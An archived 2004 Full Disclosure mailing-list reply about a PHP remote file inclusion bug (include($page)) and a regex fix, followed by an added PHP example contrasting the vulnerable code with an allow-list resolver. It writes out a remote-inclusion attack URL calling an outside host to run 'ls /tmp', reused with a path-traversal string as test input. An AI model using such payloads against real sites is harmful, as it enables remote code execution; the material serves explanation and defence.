Full Disclosure mailing list archives
Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: <m.esco () wp pl>
Date: Sat, 3 Jul 2004 10:19:19 +0200
Is this cool or not, I can't tell.:P
> Example:
> www.fuck-teso.com/index.php?page=whitehats.php
>
> index.php:
> ...
> include($page); // <--- fucking lame
> ...
>
> So, you don't know, but there is a BIGBUG.
No, it is a f*****g lame programmer bug :)
You can include a remote page that contains PHP code, which will be executed on the fuck-teso server:
www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd=ls%20/tmp

On most PHP server configurations the directive allow_url_fopen
(http://php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen) is set to off, so you cannot parse a remote script to that server. Sometimes it is not, and then there is some possibility of doing the above, of course only when some coder has not done his job properly.

Solution to "the problem": use your brain while coding, and test your code.

Quick and useful solution:

include(preg_replace("|[^\w\.]|", "", $page));

Best regards
m.esco

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
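The bug and the two fixes discussed in the message above, as an added example that is not code from the original post or from any site it names. It puts the unsanitised `include($page)` beside the `preg_replace()` one-liner from the reply and a stricter allow-list resolver, and runs constructed attack strings through both. The page names, the temporary pages directory and the sample inputs are assumptions made for illustration; the note on `allow_url_include` refers to the separate directive PHP 5.2 later introduced for include/require, which did not exist when this thread was written.

```php
<?php
// Added example, not code from the original post or from any site it names.
// It places the "include($page)" bug beside the reply's preg_replace() fix
// and a stricter allow-list resolver. Page names, the temp directory and
// the attack strings are assumptions constructed for illustration.

// 1. Vulnerable handler: the query parameter is the include path.
//    With allow_url_fopen=On (and, since PHP 5.2, allow_url_include=On)
//    ?page=http://attacker/shell.txt fetches and executes remote code;
//    with it Off, ?page=../../../etc/passwd still discloses local files.
function include_page_vulnerable(string $page): void
{
    include $page;
}

// 2. The quick fix from the reply: keep only word characters and dots.
//    "http://host/x.txt" becomes "httphostx.txt" and "../../etc/passwd"
//    becomes "....etcpasswd"; neither leaves the script's own directory,
//    but any file in that directory can still be selected for inclusion.
function sanitize_page(string $page): string
{
    return preg_replace('|[^\w\.]|', '', $page);
}

// 3. Stricter fix: map an allow-listed name to a file under a fixed
//    directory, then confirm with realpath() that it resolved there.
function resolve_page(string $page, string $pagesDir, array $allowed): ?string
{
    if (!in_array($page, $allowed, true)) {
        return null;                                   // unknown name: refuse
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $page . '.php');
    // realpath() returns false for a missing file and collapses "..",
    // so the prefix test proves the target lies inside $pagesDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Build a throwaway pages directory (assumed layout) so the resolver has
// a real target to find.
$pagesDir = sys_get_temp_dir() . '/fd_include_demo';
@mkdir($pagesDir, 0700);
file_put_contents($pagesDir . '/whitehats.php', '<?php echo "whitehats page\n";');
$allowed = ['index', 'whitehats', 'contact'];

// Constructed inputs: the legitimate page, the remote-include URL from
// the post, a traversal attempt and a null-byte truncation attempt.
$samples = [
    'whitehats',
    'http://www.ihcteam.com/we-own-teso.txt?cmd=ls%20/tmp',
    '../../../etc/passwd',
    "whitehats\0.txt",
];
foreach ($samples as $s) {
    $resolved = resolve_page($s, $pagesDir, $allowed);
    printf("%-55s sanitized=%-25s allow-list=%s\n",
        addcslashes($s, "\0"), sanitize_page($s), $resolved ?? 'rejected');
    if ($resolved !== null) {
        include $resolved;        // only ever runs for an allow-listed file
    }
}
```

Run it with the php command-line binary: the first sample resolves to the temporary whitehats.php and its output is printed, the other three are rejected by the allow-list. The sanitized column shows why the one-line regex is only a partial answer: it neutralises the remote URL and the traversal, but a request can still name any .php file that sits beside index.php, which is what the allow-list closes off.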
Current thread:
- VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Frog M@n (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! m.esco (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Duncan Hill (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Maarten (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Rudolf Polzer (Jul 03)
- Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Thomas Binder (Jul 05)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Maarten (Jul 03)
- Message not available
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Rudolf Polzer (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! nicolas vigier (Jul 04)